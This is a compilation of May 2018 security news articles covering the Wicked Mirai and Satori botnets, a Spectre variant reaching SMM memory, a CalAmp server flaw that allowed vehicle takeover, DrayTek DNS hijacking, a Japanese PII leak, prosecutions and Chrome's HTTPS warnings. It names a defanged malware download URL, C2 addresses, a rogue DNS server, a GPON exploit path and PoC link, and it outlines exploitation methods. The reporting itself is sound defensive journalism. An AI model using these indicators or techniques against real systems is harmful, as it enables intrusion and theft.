“Previously, HTTP usage was too high to mark all HTTP pages with a strong red warning, but in October 2018 (Chrome 70), we’ll start showing the red “not secure” warning when users enter data on HTTP pages,” reads a blog post published by Google.

Chrome 70 treatment for HTTP pages with user input

“We hope these changes continue to pave the way for a web that’s easy to use safely, by default. HTTPS is cheaper and easier than ever before, and unlocks powerful capabilities — so don’t wait to migrate to HTTPS! Check out our set-up guides to get started.” explained Emily Schechter, Product Manager, Chrome Security”


Updated – The new Wicked Mirai botnet leverages at least three new exploits
20.5.2018 securityaffairs BotNet

Security experts from Fortinet have spotted a new variant of the Mirai botnet dubbed ‘Wicked Mirai’, it includes new exploits and spread a new bot.
The name Wicked Mirai comes from the strings in the code, the experts discovered that this new variant includes at least three new exploits compared to the original one.

“The FortiGuard Labs team has seen an increasing number of Mirai variants, thanks to the source code being made public two years ago.” reads the analysis published by Fortinet.

“Some made significant modifications, such as adding the capability to turn infected devices into swarms of malware proxies and cryptominers. Others integrated Mirai code with multiple exploits targeting both known and unknown vulnerabilities, similar to a new variant recently discovered by FortiGuard Labs, which we now call WICKED.”

Wicked Mirai

The Mirai botnet was first spotted in 2016 by the experts at MalwareMustDie, at the time it was used to power massive DDoS attacks in the wild. The Mirai’s source code was leaked online in October 2016, since then many other variants emerged in the wild, including Satori, Masuta, and Okiru.

According to Fortinet, the author of the Wicked Mirai is the same as the other variants.

Mirai botnets are usually composed of three main modules: Attack, Killer, and Scanner. Fortinet focused its analysis on the Scanner module that is responsible for the propagation of the malware.

The original Mirai leveraged brute force attempts to compromise other IOT devices, while the WICKED Mirai uses known exploits.

The Wicked Mirai would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to IoT devices. Once it has established a connection, the bot will attempt to exploit the device and download its payload by writing the exploit strings to the socket through the write() syscall.

The experts discovered that the exploit to be used depends on the specific port the bot was able to connect to. Below the list of devices targeted by the Wicked Mirai

Port 8080: Netgear DGN1000 and DGN2200 v1 routers (also used by Reaper botnet)
Port 81: CCTV-DVR Remote Code Execution
Port 8443: Netgear R7000 and R6400 Command Injection (CVE-2016-6277)
Port 80: Invoker shell in compromised web servers
The analysis of the code revealed the presence of the string SoraLOADER, which suggested it might attempt to distribute the Sora botnet. Further investigation allowed the researchers to contradict this hypothesis and confirmed the bot would actually connect to a malicious domain to download the Owari Mirai bot.

“After a successful exploit, this bot then downloads its payload from a malicious web site, in this case, hxxp://185[.]246[.]152[.]173/exploit/owari.{extension}. This makes it obvious that it aims to download the Owari bot, another Mirai variant, instead of the previously hinted at Sora bot.” reads the analysis.

“However, at the time of analysis, the Owari bot samples could no longer be found in the website directory. In another turn of events, it turns out that they have been replaced by the samples shown below, which were later found to be the Omni bot.”

The analysis of the website’s /bins directory revealed other Omni samples, which were apparently delivered using the GPON vulnerability CVE-2018-10561.

Wicked Mirai 2.png

Searching for a link between Wicked, Sora, Owari, and Omni, the security researchers at Fortinet found an interview with Owari/Sora IoT Botnet author dated back to April.

The vxer, who goes by the online handle of “Wicked,” that at the time said he abandoned the Sora botnet and was working on Owari one.

The conversation suggests the author abandoned both Sora and Owari bots and he is currently working on the Omni project.

“Based on the author’s statements in the above-mentioned interview as to the different botnets being hosted in the same host, we can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author’s succeeding projects,” Fortinet concludes.

Update May 19, 2018 – Spaeaking with MalwareMustDie
I have contacted Malware Must Die for a comment on the Wicked Mirai botnet.

Below the observations he shared with me:

Same coder.
The author put all of the high-possibility exploit code in Mirai
GPON was seemed used on separate pwn scheme by different script outside of the Mirai, but being used to infect Mirai.
MalwareMustDie researchers told me that they passed the identity of the author to the related country LEA. They explained to me that even if they made several reports to the authorities, law enforcement failed in preventing the diffusion of the malicious code. The experts showed me official report to LEA dated back January 2018, when they alerted authorities of propagations of new Mirai variants.

“the ID of the actor was passed to the related country LEA from our team that investigated result too since we published the Satori/Okiru variant a while ago, way before ARC CPU variant was spotted.” MMD told me.

“So by the release of the OWARI, SORA, and WICKED, this is what will happen if we let the malware actor running loose unarrested. More damage will be created and they just don’t know how to stop them self.”


Experts propose a new variation of the Spectre attack to recover data from System Management Mode
20.5.2018 securityaffairs
Attack

Researchers from Eclypsium proposed a new variation of the Spectre attack that can allow attackers to recover data stored inside CPU System Management Mode.
Security experts from Eclypsium have devised a new variation of the Spectre attack that can allow attackers to recover data stored inside CPU System Management Mode (SMM) (aka called ring -2).

The SMM is an operating mode of x86 CPUs in which all normal execution, including the operating system, is suspended.

When a code is sent to the SMM, the operating system is suspended and a portion of the UEFI/BIOS firmware executes various commands with elevated privileges and with access to all the data and hardware.

“The main benefit of SMM is that it offers a distinct and easily isolated processor environment that operates transparently to the operating system or executive and software applications.” reads Wikipedia.

The SMM mode was first released with the Intel 386SL in the early 90s, Intel CPUs implements a memory protection mechanism known as a range register to protect sensitive contents of memory regions such as SMM memory.

SMM memory on Intel CPUs is protected by a special type of range registers known as System Management Range Register (SMRR).

Eclypsium experts based their study on a public proof-of-concept code for the Spectre variant 1 (CVE-2017-5753) vulnerability to bypass the SMRR mechanism and access to the content of the System Management RAM (SMRAM) that contains the SMM and where the SMM working data is executed.

“Because SMM generally has privileged access to physical memory, including memory isolated from operating systems, our research demonstrates that Spectre-based attacks can reveal other secrets in memory (eg. hypervisor, operating system, or application).” states the report published by Eclypsium.

“These enhanced Spectre attacks allow an unprivileged attacker to read the contents of memory, including memory that should be protected by the range registers, such as SMM memory. This can expose SMM code and data that was intended to be confidential, revealing other SMM vulnerabilities as well as secrets stored in SMM,”

The experts ported the PoC code to a kernel driver and demonstrated it works from the kernel privilege level. Then they run they exploit code from the kernel privilege level against protected memory.

“The kernel-level PoC exploit provides access to different hardware interfaces, which gives attackers better control over the system hardware and access to different hardware interfaces such as physical memory, IO, PCI, and MMIO interfaces. It also provides access to interfaces at a higher privilege level, such as software SMI.” explained the researchers.

“Next, we integrated the PoC exploit into CHIPSEC in order to quickly expand our tests. In our first experiment, we tried to read protected SMRAM memory. We mapped the physical addresses of SMRAM into the virtual address space and then used the SMRAM addresses as the target of our exploit.”

The experts believe that it is possible to obtain the same result by using Spectre variant 2 (CVE-2017-5715) can also achieve the same results.

Eclypsium reported the new attack technique to Intel in March. Intel replied that the security updates released for the Spectre variant 1 and variant 2 should be enough to mitigate this new attack.


Misconfigured CalAmp server allowed hacker to take over a lot of vehicles
20.5.2018 securityaffairs Hacking

Security researchers discovered that a misconfigured server operated by the CalAmp company could allow anyone to access account data and takeover the associated vehicle.
CalAmp is a company that provides backend services for several well-known systems.

Security researchers Vangelis Stykas and George Lavdanis discovered that a misconfigured server operated by the CalAmp company could allow anyone to access account data and takeover the associated vehicle.

The experts were searching for security vulnerabilities in the Viper SmartStart system, a device that allows users to remotely start, lock, unlock, or locate their vehicles directly using a mobile app on their smartphones.

As with many other mobile applications, it used secure connections with SSL and Certificate Pinning (Hard-code in the client the certificate is known to be used by the server) to automatically reject a connection from sites that offer bogus SSL certificates.

The experts noticed that the app was connecting to mysmartstart.com domain and also to the third party domain (https://colt.calamp-ts.com/), it is the Calamp.com Lender Outlook service.

The experts discovered that using the credentials for the user created from the viper app it was possible to login the panel.

“This panel seemed to be the frontend for Calamp.com Lender Outlook service. We tried our user created from the viper app, to login and it worked!” reads the blog post published by Stykas.

“This was a different panel which seemed to be targeted to the companies that have multiple sub-accounts and a lot of vehicles so that they can manage them.”

CalAmp car hacking.png

Further tests allowed the researchers to verify that the portal was secured, but during the assessment, the experts discovered that the reports were delivered by another dedicated server running tibco jasperreports software.

This was the first time the experts analyzed this type of server, they had to improvise and after removing all parameters they discovered they were logged in as a user with limited rights but with access to a lot of reports.

“None of us were familiar with that so we had to improvise. Removing all the parameters we found out that we were already logged in with a limited user that had access to A LOT of reports.” continues the report.

“We had to run all those reports for our vehicles right? Well the ids for the user was passed automatically from the frontend but now we had to provide them from the panel as an input.And…well..we could provide any number we wanted.”

The researchers gained access to all the reports for all the vehicles (including location history), and also data sources with usernames (the passwords were masked and there was no possibility to export them).

The server also allowed for the copying and editing any existing reports.

“We could not create a report or an adhoc or pretty much anything else, but we could copy paste existing ones and edit them so we can do pretty much anything.We could also edit the report and add arbitrary XSS to steal information but this was not something that we (or anyone in their right lawful mind) would want to do.” continues the report.

The availability of all production databases on the server, including CalAmp connect device outlook, was exploited by the researchers to take over a user account via the mobile application. If the attacker knows the older password for the account can simply walk to the car, unlock it, start the engine, and possibly steal the vehicle.

According to the experts the exploitation of the flaw could allow:

Well the very obvious just change the user password to a known one go to the car, unlock, start and leave.
Get all the reports of where everyone was
Stop the engine while someone was driving ?
Start the engine when you shouldn’t.
Get all the users and leak.
As we haven’t actually seen the hardware we might be able to pass can bus messages though the app ?
Get all the IoT devices from connect database or reset a password there and start poking around.
Really the possibilities are endless…
The experts reported the issue to CalAmp at the beginning of May 2018, and the company addressed the flaw in ten days.


More than 800,000 DrayTek routers at risks due to a mysterious zero-day exploit
19.5.2018 securityaffairs
Exploit

DrayTek routers are affected by a zero-day vulnerability that could be exploited by attackers to change DNS settings on some models.
Routers manufactured by the Taiwan-based vendor DrayTek are affected by a zero-day vulnerability that could be exploited by attackers to change DNS settings on some of its routers.

DrayTek confirmed to be aware that hackers are attempting to exploit the zero-day vulnerability to compromise its routers.

Many users reported on Twitter cyber attacks against its routers, in these cases, hackers have changed DNS settings of the routers to point to a server having the 38.134.121.95 IP address on the network of China Telecom.

It is likely attackers are conducting a Man-in-the-Middle attack to redirect users to bogus clones of legitimate sites to steal their credentials.

DrayTek routers zeroday

DrayTek published a security advisory warning of the attacks and providing instructions on how to check and correct DNS settings.

“In May 2018, we became aware of new attacks against web-enabled devices, which includes DrayTek routers. The recent attacks have attempted to change DNS settings of routers.” reads the security advisory.

” If you have a router supporting multiple LAN subnets, check settings for each subnet. Your DNS settings should be either blank, set to the correct DNS server addresses from your ISP or DNS server addresses of a server which you have deliberately set (e.g. Google 8.8.8.8). A known rogue DNS server is 38.134.121.95 – if you see that, your router has been changed. “

The company is already working on a firmware updates to patch the issue.

DrayTek published a second advisory that includes the list of devices and firmware versions that it is going to release in the coming days.
Initially, the company suspected that victims of the attacks were using DrayTek routers with default credentials, but one of them clarified that its device wasn’t using factory settings, a circumstance that confirms that attackers are in possession of a zero-day exploit.

Kevin Beaumont

@GossiTheDog
Reports coming in DrayTek routers are being mass hacked and DNS servers changed on them (allows traffic redirection and MITM attacks). https://twitter.com/adamitec/status/997237081461133312 …

11:35 AM - May 18, 2018
69
89 people are talking about this
Twitter Ads info and privacy

Kevin Beaumont

@GossiTheDog
18 May
Reports coming in DrayTek routers are being mass hacked and DNS servers changed on them (allows traffic redirection and MITM attacks). https://twitter.com/adamitec/status/997237081461133312 …

Kevin Beaumont

@GossiTheDog
😢 pic.twitter.com/xMXak22JNG

11:37 AM - May 18, 2018
View image on Twitter
20
15 people are talking about this
Twitter Ads info and privacy

Kevin Beaumont

@GossiTheDog
18 May
Replying to @GossiTheDog
😢 pic.twitter.com/xMXak22JNG

Kevin Beaumont

@GossiTheDog
The running theme so far is remote admin (WAN mgmt) is enabled (on by default) but password had been changed. Either going to be brute force or exploit.

1:24 PM - May 18, 2018
11
See Kevin Beaumont's other Tweets
Twitter Ads info and privacy
Searching for DrayTek routers online with Shodan we can find more than 800,000 connected devices connected online, some of them could be potentially compromised with the mysterious exploit.


200 Million Sets of Japanese PII Emerge on Underground Forums
19.5.2018 securityweek Incindent

A dataset allegedly containing 200 million unique sets of personally identifiable information (PII) exfiltrated from several popular Japanese website databases emerged on underground forums, FireEye reports.

Advertised by a Chinese threat actor at around $150, the dataset contained names, credentials, email addresses, dates of birth, phone numbers, and home addresses, and was initially spotted in December 2017.

The data appears sourced from a variety of Japanese websites, including those in the retail, food and beverage, financial, entertainment, and transportation sectors, and FireEye believes that the cybercriminals obtained it via opportunistic compromises.

The data, which the security researchers believe to be authentic, appears to have been acquired between May and June 2016, though data in one folder suggests some of it was obtained in May and July 2013, FireEye explains in a report shared with SecurityWeek.

Apparently, several actors commented on the advertisement, saying they were interested in purchasing the dataset, but they also provided negative feedback, claiming they did not receive the advertised product.

The dataset contains “at least 200 million lines of data from a possible range of 11 to 50 Japanese websites,” and FireEye discovered that the data is highly varied and not available through publicly available data sources.

Furthermore, analysis of the leak suggested that much of the data was genuine, given that most of the email addresses out of a random sample of 200,000 were previously seen in major leaks, thus unlikely to have been fabricated.

“Since we did not observe most of the leaked data in any dataset as coming from one specific leak or on any publicly available website, this also indicates that the actor is unlikely to have bought or scraped the information from data leaks and resold it as a new product,” FireEye explains.

In another sample of 190,000 credentials, 36% contained duplicate values, the researchers say. Furthermore, a significant number of fake email addresses was observed, suggesting that the actual number of real and unique credentials and sets of PII is lower than advertised.

Filenames in the dataset included “a Japanese food brand, an unnamed online handbag shop, an unnamed adult website, an unnamed shipping company, a gaming website, a beauty company, and other references,” the researchers reveal.

The exfiltrated data includes information usually associated with websites with customer login and profile information, and the actor appears to have had access only to data normally stored on servers connected to a website or web portal.

What the security researchers couldn’t verify, however, was that the exfiltrated data indeed came from the claimed sources. The actor might have labeled the files in the data leak using the names of Japanese websites, but the researchers believe the individual had little incentive to falsify the data sources.

The hacker appears to have been actively selling website databases on Chinese underground forums since at least 2013 and FireEye experts found two personas likely tied to the individual through a common QQ address connected to a person living in China’s Zhejiang province.

The actor was observed selling data stolen from websites in China, Taiwan, Hong Kong, European countries, Australia, New Zealand, and North American countries.

However, because the actor has a “significant portion of negative reviews on underground forums,” the sold information could be fabricated or might have been sold before. The negative reviews claimed that the individual either did not deliver data or did not provide the expected product.

“Since much of this information has been previously leaked in large-scale data leaks, as well as the possibility that it has been previously sold, we anticipate that this dataset will not enable new large scale malicious activity against targeted entities or individuals with leaked PII,” FireEye says.


More Charges Against 'Syrian Electronic Army' Hackers
19.5.2018 securityweek  BigBrothers

The U.S. Justice Department on Thursday announced more charges against two Syrian nationals believed to be members of the “Syrian Electronic Army” hacker group.

Ahmad ‘Umar Agha, 24, known online as “The Pro,” and Firas Dardar, 29, known online as “The Shadow,” have been indicted on 11 counts of conspiracy to commit computer fraud, conspiracy to commit wire fraud, and aggravated identity theft.

The charges stem from spear-phishing attacks allegedly launched by the men against a wide range or government and private organizations, including the Executive Office of the President, the Marine Corps, NASA, Human Rights Watch, and a long list of media companies, such as CNN, Reuters, National Public Radio, The Washington Post, The New York Times, the Associated Press, The Onion, Time, USA Today, and The New York Post.

The goal of the phishing attacks was to help the hackers obtain usernames and passwords, which they could use to deface websites, redirect the visitors of the targeted site to their own domains, steal emails, and hijack social media accounts.

Authorities pointed out that the computer fraud and wire fraud conspiracy charges carry maximum prison terms of 5 and 20 years in prison, respectively, and the aggravated identity theft charges carry up to 18 years in prison.

The men were previously charged in 2014 – the criminal complaints were only unsealed in 2016 – alongside Peter “Pierre” Romar, who had been residing in Germany. Romar was arrested and pleaded guilty to hacking and extortion charges in September 2016.

Ahmad ‘Umar Agha and Firas Dardar are still at large and are believed to be residing in Syria. They are on the FBI’s Cyber Most Wanted list, with a reward of up to $100,000 being offered for information leading to their arrest.

The new indictment comes as the five-year statute of limitations for some of the crimes they were previously charged for is about to expire.


Man Sentenced to 15 Years in Prison for DDoS Attacks, Firearm Charges
19.5.2018 securityweek  Crime

A New Mexico man has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.

John Kelsey Gammell, 55, used several so-called booter services to launch cyberattacks, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser. His targets included former employers, business competitors, companies that refused to hire him, colleges, law enforcement agencies, courts, banks, and telecoms firms.

Gammell took measures to avoid exposing his real identity online, including through the use of cryptocurrencies to pay for the DDoS attacks and VPNs. However, a couple of taunting emails he sent to his victims during the DDoS attacks – asking if they had any IT issues he could help with – were sent from Gmail and Yahoo addresses that had been accessed from his home IP address.

The man initially rejected a plea deal and his attorney sought the dismissal of the case, but in January he pleaded guilty to one count of conspiracy to commit intentional damage to a protected computer and two counts of being a felon-in-possession of a firearm. Gammell, a convicted felon, admitted having numerous firearms and hundreds of rounds of ammunition.

In addition to the 180-month prison sentence, Gammell will have to pay restitution to victims of his DDoS attacks, but that amount will be determined at a later date.


Chrome to Issue Red "Not Secure" Warning for HTTP
19.5.2018 securityweek  Security

Google is putting yet another nail in the HTTP coffin: starting with Chrome 70, pages that are not served over a secure connection will be marked with a red warning.

The search giant has been pushing for an encrypted web for many years, and suggested in 2014 that all HTTP sites be marked as insecure.

Google proposed that Chrome would initially mark HTTP pages serving password fields or credit card interactions as “Not Secure,” and only then move to marking all of them in a similar manner.

Now, Google believes that the Chrome security indicators should evolve in line with a wider adoption of HTTPS across the Internet.

At the beginning of May 2018, over 93% of the traffic across Google resources was being served over an encrypted connection, a major improvement since early 2014, when only 50% of the traffic was encrypted.

Similar advancements were observed across the web as well, where around three quarters of the pages loaded via Chrome at the end of last week were served over HTTPS. Three years ago, only around 40% of the loaded pages were using HTTPS.

Given the wider adoption of HTTPS, Google is now ready to make another push towards eliminating unencrypted connections by marking HTTP pages with a red “Not Secure” warning.

“Previously, HTTP usage was too high to mark all HTTP pages with a strong red warning, but in October 2018 (Chrome 70), we’ll start showing the red “not secure” warning when users enter data on HTTP pages,” Emily Schechter, Product Manager, Chrome Security, notes in a blog post.

This, however, is one of the major changes Google is making to Chrome’s security indicators. Thus, Chrome 69 will remove the (green) “Secure” wording and HTTPS scheme in September 2018.

“Users should expect that the web is safe by default, and they’ll be warned when there’s an issue. Since we’ll soon start marking all HTTP pages as ‘not secure’, we’ll step towards removing Chrome’s positive security indicators so that the default unmarked state is secure,” Schechter notes.

Google isn’t the only Internet company to be pushing for the adoption of HTTPS: WordPress started offering free HTTPS to all hosted websites, Let’s Encrypt provides free HTTPS certificates, and Amazon is offering free security certificates to AWS customers.

Starting last year, Firefox too is warning users when webpages are serving login fields over an unsecure, HTTP connection.

As of May 1, Chrome is also displaying a warning when encountering a publicly-trusted certificate (DV, OV, and EV) issued after April 30 that is not compliant with the Chromium Certificate Transparency (CT) Policy.

“We hope these changes continue to pave the way for a web that’s easy to use safely, by default. HTTPS is cheaper and easier than ever before, and unlocks powerful capabilities -- so don’t wait to migrate to HTTPS,” Schechter concludes.


Misconfigured CalAmp Server Enabled Vehicle Takeover
19.5.2018 securityweek  Security

A misconfigured server operated by CalAmp, a company offering the backend for a broad range of well-known car alarm systems, provided anyone with access to data and even allowed for account and vehicle takeover.

The issue was discovered by security researchers Vangelis Stykas and George Lavdanis, while looking for issues in the Viper SmartStart system, which allows users to remotely start, lock, unlock, or locate their vehicles directly from their smartphones.

The researchers discovered that the application uses a SSL connection and uses SSL pinning to prevent tampering.

However, the application also connected to the Calamp.com Lender Outlook service, where login was possible using the credentials from the Viper app.

“This was a different panel which seemed to be targeted to the companies that have multiple sub-accounts and a lot of vehicles so that they can manage them,” Stykas notes.

While everything on the domain was correctly secured, the researchers then discovered that the reports were delivered by another server running tibco jasperreports software. After removing all parameters there, the researchers discovered they were logged in as a user with limited rights but with access to a variety of reports.

“We had to run all those reports for our vehicles right? Well the ids for the user was passed automatically from the frontend but now we had to provide them from the panel as an input. And…well...we could provide any number we wanted,” the researcher explains.

The server not only provided access to all the reports for all the vehicles, including location history, but also included data sources with usernames (although the passwords were masked). Furthermore, the server allowed for the copying and editing of existing reports, meaning that an attacker could add arbitrary XSS to steal information.

With all production databases present on the server, including CalAmp connect device outlook, the researchers then discovered that it was possible to take over a user account via the mobile application, as long as an older password for the account was known. From the application, it is then possible to manipulate the connected device, in this case a vehicle.

Basically, an attacker who knows an old password for an account can change the current password to the old one, then simply walk to the car, unlock it, start the engine, and possibly steal the vehicle.

The vulnerability also allows an attacker to retrieve a list of all users and location reports on users, or start a vehicle’s engine whenever they want. They could also “get all the IoT devices from connect database or reset a password there and start poking around,” the researcher notes.

The researchers reported the issue to CalAmp in the beginning of May 2018, and the company resolved the bug within 10 days of receiving the report. They also updated their website to make it easier for security researchers to report any other vulnerabilities they discover in the company’s products.


F-Secure Unveils New Endpoint Detection & Response Solution
19.5.2018 securityweek  Security

Finland-based cybersecurity firm F-Secure on Thursday announced the launch of a new endpoint detection and response (EDR) solution that combines human expertise and artificial intelligence.

The new offering, F-Secure Rapid Detection & Response, is designed to help organizations protect their IT systems against targeted attacks.

The solution leverages lightweight endpoint sensors and AI-powered data analysis capabilities to monitor devices for malicious activity. Rapid Detection & Response creates a baseline for normal behavior and flags any unusual activity. Suspicious behavior is subjected to additional analysis to prevent false positives that could overwhelm security teams, F-Secure said.

The product can be configured to respond to potential threats in various ways. It can provide guidance to the organization’s IT team or managed service provider on how to respond to an incident, or it can take action automatically in order to contain an attack. More difficult cases can be escalated to a local partner that is trained and supported by F-Secure experts.

Each potential threat is analyzed using a process that F-Secure has named Broad Context Detection, which leverages both human expertise and AI to help organizations validate threats and assess their impact.

F-Secure EDR

“One trick that’s common in modern attacks is to disguise malicious activity as something normal, and attackers are always finding new ways to do this. And since there’s countless numbers of normal things happening in any given environment, it’s basically impossible for companies to rely on human experts or artificial intelligence alone to comb through all that data,” explained F-Secure Chief Technology Officer Mika Stahlberg.

“Artificial intelligence trained by the best cyber security experts is vital when you’re looking for needles in a digital haystack, and in the right hands, it’s able to keep defenders a step ahead of even the most skilled, highly motivated attackers,” Stahlberg added.

F-Secure Rapid Detection & Response is available through the security firm’s network of authorized partners. The solution can be managed directly by an organization’s IT department or it can be used as a managed service from one of F-Secure’s partners.


A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms
19.5.2018 securityaffairs Crime

A New Mexico man admitted being responsible for
DDoS attacks against the websites of former employers, business competitors, and public services.
John Kelsey Gammell, 55, from New Mexico has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.

The man used popular ‘services of “DDoS-for-hire” companies to power DDoS attacks against its victims, cyberattacks, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser.

The list of the victims is long and include business competitors, former employers, law enforcement agencies, courts, banks, telecoms companies, and firms that refused to hire him.

The man used VPN services to hide his identity and cryptocurrency for his payments, but he was identified due to a poor ops sec. The man sent emails to the victims while they were under DDoS attacks and proposed his services to mitigate the problems. The mails were sent from Gmail and Yahoo accounts he accessed from his home without masquerading his real IP address.

stresser

The man initially rejected a plea deal, but in January he pleaded guilty to commit intentional damage to a protected computer, admitting to launching DDoS attacks on websites in the United States in the period between July 2015 and March 2017. He also pleaded guilty to two counts of being a felon-in-possession of firearms and ammunition.

The man was condemned to 180-month in jail and will have to compensate the victims of his DDoS attacks, the overall amount will be determined soon.


Satori Botnet is targeting exposed Ethereum mining pools running the Claymore mining software
19.5.2018 securityaffairs BotNet

While a new variant of the dreaded Mirai botnet, so-called Wicked Mirai, emerged in the wild the operators of the Mirai Satori botnet appear very active.

Experts observed hackers using the Satori botnet to mass-scan the Internet for exposed Ethereum mining pools, they are scanning for devices with port 3333 exposed online.

The port 3333 is a port commonly used for remote management by a large number of cryptocurrency-mining equipment.

The activities were reported by several research teams, including Qihoo 360 Netlab, SANS ISC, and GreyNoise Intelligence.

360 Netlab
@360Netlab
Do you see port 3333 scan traffic going up? Satori botnet is scanning it now, see our Scanmon trend https://scan.netlab.360.com/#/dashboard?tsbeg=1525536000000&tsend=1526140800000&dstport=3333&toplistname=srcip&topn=10&sortby=sum …, and try a dns lookup for one of the control domain it is using now, dig any http://c.sunnyjuly.gq , I personally like yesterday's TXT result more

8:32 PM - May 11, 2018
30
19 people are talking about this
Twitter Ads info and privacy
Starting from May 11, experts are observing the spike in activity of the Satori botnet.
satori botnet activity
According to the researchers at GreyNoise, threat actors are focused on equipment running the Claymore mining software, once the attackers have found a server running this software they will push instructions to force the device to join the ‘dwarfpool’ mining pool using the ETH wallet controlled by the attackers.

GreyNoise Intelligence
@GreyNoiseIO
12 May
GreyNoise observed a large spike of TCP port 3333 scan traffic today. This is the default port for the "Claymore" dual Ethereum/Decred cryptocurrency miner. pic.twitter.com/5g6vVbPLNq

GreyNoise Intelligence
@GreyNoiseIO
Once the attacker identifies a server running the Claymore software they push instructions to reconfigure the device to join the "dwarfpool" mining pool and use the attacker's ETH wallet (https://etherscan.io/address/0xd0897da92bd7d7754f4ea18f8169dbc08beb8df7 …) pic.twitter.com/0IVo7CKsjf

12:43 AM - May 12, 2018


2
See GreyNoise Intelligence's other Tweets
Twitter Ads info and privacy
The experts noticed that most of the devices involved in the mass scanning are compromised GPON routers located in Mexico.

The experts monitored five botnets using the compromised GPON routers to scan for Claymore miners, one of them is the Satori botnet that is leveraging an exploit for the attack.

GreyNoise Intelligence
@GreyNoiseIO
12 May
Replying to @GreyNoiseIO
Effective 6:43 PM EST the attacker has only mined ~$200 worth of ETH

GreyNoise Intelligence
@GreyNoiseIO
Interestingly, 95% of the devices scanning for port 3333 today are located in the same residential ISP in Mexico (https://twitter.com/Telmex ) as the majority of the hosts affected by the GPON vulnerability disclosed earlier this week. https://twitter.com/GreyNoiseIO/status/994486111178252288 …

12:45 AM - May 12, 2018
1
See GreyNoise Intelligence's other Tweets
Twitter Ads info and privacy

GreyNoise Intelligence
@GreyNoiseIO
GreyNoise has observed ~13,000 compromised home routers probing the Internet for the '/GponForm/diag_Form' URI over the past 96 hours, likely related to the weaponization of CVE-2018-10561. Most devices are located in the "Uninet" ISP in Mexico.

Ref: https://github.com/f3d0x0/GPON

9:55 AM - May 10, 2018
20
22 people are talking about this
Twitter Ads info and privacy
Below the details of the five botnets published by Netlab 360:

Satori: Satori is the infamous variant of the mirai botnet.
We first observed this botnet coming after the GPON vulnerable devices at 2018-05-10 05:51:18, several hours before our last publish.
It has quickly overtakes muhstik as the No.1 player.
Mettle: A malicious campaign based on IP addresses in Vietnam (C2 210.245.26.180:4441, scanner 118.70.80.143) and mettle open source control module
Hajime: Hajime pushed an update which adds the GPON’s exploits
Two Mirai variants: At least two malicious branches are actively exploiting this vulnerability to propagate mirai variants. One of them has been called omni by newskysecurity team.
imgay: This appears like a botnet that is under development. Its function is not finished yet.
“In our previous article, we mentioned since this GPON Vulnerability (CVE-2018-10561, CVE-2018-10562 ) announced, there have been at least five botnets family mettle, muhstik, mirai, hajime, satori actively exploit the vulnerability to build their zombie army in just 10 days.” reads a blog post published by Netlab 360.

“From our estimate, only 2% all GPON home router is affected, most of which located in Mexico.”

“The source of this scan is about 17k independent IP addresses, mainly from Uninet SA de CV, telmex.com, located in Mexico,”

Researchers at SANS ISC that analyzed the Satori botnet activity discovered the bot is currently exploiting the CVE-2018-1000049 remote code execution flaw that affects the Nanopool Claymore Dual Miner software.

The experts observed the availability online of proof-of-concept code for the CVE-2018-1000049 vulnerability.

“The scan is consistent with a vulnerability, CVE 2018-1000049, released in February [2]. The JSON RPC remote management API does provide a function to upload “reboot.bat”, a script that can then be executed remotely. The attacker can upload and execute an arbitrary command using this feature.” reads the analysis published by the SANS ISC.

“The port the API is listening on is specified when starting the miner, but it defaults to 3333. The feature allows for a “read-only” mode by specifying a negative port, which disables the most dangerous features. There doesn’t appear to be an option to require authentication.”


"Wicked" Variant of Mirai Botnet Emerges

18.5.2018 securityweek  BotNet

A new variant of the Mirai Internet of Things (IoT) botnet has emerged, which features new exploits in its arsenal and distributing a new bot, Fortinet researchers warn.

Called Wicked, based on strings found in the code, the malware has added three new exploits compared to Mirai and appears to be the work of the same developer behind other Mirai variants.

The Mirai botnet was first spotted in the third quarter of 2016, when it fueled some of the largest distributed denial of service (DDoS) attacks at the time. The malware’s source code was leaked online in October 2016, and numerous variants have been observed ever since: Masuta, Satori, Okiru, and others.

Similar to other botnets based on Mirai, the newly discovered Wicked iteration contains three main modules: Attack, Killer, and Scanner. Unlike Mirai, however, which used brute force to gain access to vulnerable IoT devices, Wicked uses known and available exploits, many of which are already old, the security researchers discovered.

Wicked would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to the target device. Upon establishing a connection, the malware attempts to exploit the device and upload a payload to it by writing the exploit strings to the socket.

The used exploit depends on the specific port that the connection was established to. On port 8080, the malware uses Netgear DGN1000 and DGN2200 v1 router exploits (also used by Reaper botnet), on port 81 it uses a CCTV-DVR Remote Code Execution exploit, on port 8443 a Netgear R7000 and R6400 Command Injection (CVE-2016-6277), and on port 80 an invoker shell in compromised web servers.

Wicked contains the string SoraLOADER, which initially suggested it might attempt to distribute the Sora botnet. Instead, the researchers discovered that the malware would actually connect to a malicious domain to download the Owari bot, a different Mirai variant.

Although the website was confirmed to have distributed Owari, the security researchers couldn’t retrieve bot samples from the website directory. Furthermore, they discovered that the samples had been replaced by another malware family, the Omni bot.

Looking through the website’s /bins directory, the security researchers discovered other Omni samples, which were apparently delivered using the Gigabit-capable Passive Optical Network (GPON) vulnerability CVE-2018-10561.

While looking for the connections between Wicked, Sora, Owari, and Omni, the security researchers found an April interview with the developer behind Sora and Owari, who goes by the online handle of “Wicked” himself. At the time, the malware author said that Sora was abandoned, but work on Owari would continue, with no new projects planned.

Based on their findings and the malware author’s saying, Fortinet believes that both Sora and Owari bots have been abandoned, and that Omni is the current project the developer works on.

“Based on the author’s statements in the above-mentioned interview as to the different botnets being hosted in the same host, we can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author’s succeeding projects,” Fortinet concludes.


Net Neutrality: Party Politics and Consumer Concerns
18.5.2018 securityweek  BigBrothers

